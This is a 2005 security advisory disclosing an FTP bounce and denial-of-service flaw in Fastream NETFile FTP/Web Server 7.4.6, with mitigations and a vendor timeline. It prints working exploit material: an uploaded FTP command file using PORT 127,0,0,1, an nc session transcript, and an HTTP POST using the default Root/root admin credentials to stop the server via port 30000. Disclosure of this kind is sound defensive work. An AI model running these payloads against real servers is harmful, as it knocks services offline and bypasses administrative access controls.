 |
|
|
by Tan Chew Keong
Release Date: 17 May 2005
Fastream NETFile FTP/Web Server
is a secure FTP server and Web server combined together in one program. It claims to be the "easiest to setup and
administer server" on the Internet.
The default installation of NETFile FTP does not validate the IP address supplied in a PORT command. This
may be exploited to perform a FTP Bounce attack from the
server. It may also be exploited by a user with upload privilege to cause a Denial-of-Service (DoS) on server.
Fastream NETFile FTP/Web Server Version 7.4.6 on English Win2K SP4.
Default installation of NETFile FTP Server allows the PORT command to be used with an arbitrary IP address (including
the server's own IP address and 127.0.0.1). This may be exploited to perform a FTP Bounce attack from the server since
it is possible to use the PORT command with an IP address that is different from the logon user's IP address.
The vendor clarified that this is a feature that is required to support FXP. However, we recommend that this feature
should be
disabled with the default installation, and only administrators who intend to support FXP (and fully aware of the risks)
should turn it on.
More importantly, the server allows PORT commands containing its own IP address and the localhost address (127.0.0.1).
This may be exploited by a user with upload privilege to cause a DoS on the FTP server.
A malicious user may cause a DoS on the FTP server by uploading a text file containing the following text, and naming
it "a.txt". Note that there must be a CR after the last line.
USER anonymous
PASS a
PORT 127,0,0,1,0,21
RETR a.txt
c:\> nc 192.168.2.102 21
220 Fastream NETFile FTP Server
USER anonymous
331 Password required for anonymous.
PASS a
230 User anonymous has successfully logged in.
PORT 127,0,0,1,0,21
200 Port command successful.
RETR a.txt
150 Opening data connection for a.txt.
226 File sent ok
NETFile FTP server has an admin port that listens on 127.0.0.1:30000. If the default admin password of
the FTP server (Root/root) was not changed, the above vulnerability may be exploited to deliver admin commands to the server,
bypassing the localhost restriction and any firewalls that may be blocking port 30000. For example, a malicious user may
upload the following file and send it to port 30000 by exploiting the PORT command. This will shutdown the FTP server,
assuming that the default admin password was not changed.
POST / HTTP/1.1
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Fastream NETFile Server
Host: 127.0.0.1:30000
Content-Length: 232
Cache-Control: no-cache
<?xml version="1.0"?>
<message><type>request</type><adminlogindata><username>Root</username>
<password>root</password></adminlogindata><requestType>STOP_FTP_SERVER</requestType>
<data><serverName>Default</serverName></data></message>
- Upgrade to Version 7.6, which allows disabling of FXP if it is not required.
- Note that if FXP is enabled, the above mentioned DoS attack is still possible (i.e. PORT 127,0,0,1,x,y is possible). Hence, if you enable FXP, you should only allow trusted users to logon to your FTP server.
- Set a strong password for the admin interface.
17 Apr 05 - Vulnerability Discovered.
21 Apr 05 - Initial Vendor Notification.
21 Apr 05 - Received reply that this is a feature required to support FXP.
21 Apr 05 - Provided Vendor with DoS Exploitation Scenario.
15 May 05 - Vendor Released Version 7.6 that allows disabling of FXP.
15 May 05 - Informed Vendor about DoS Issue.
15 May 05 - Vendor replied that if FXP is enabled, then all users are assumed to be trusted.
17 May 05 - Public Release.
For further questions and enquries, email them to the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg
|
 |
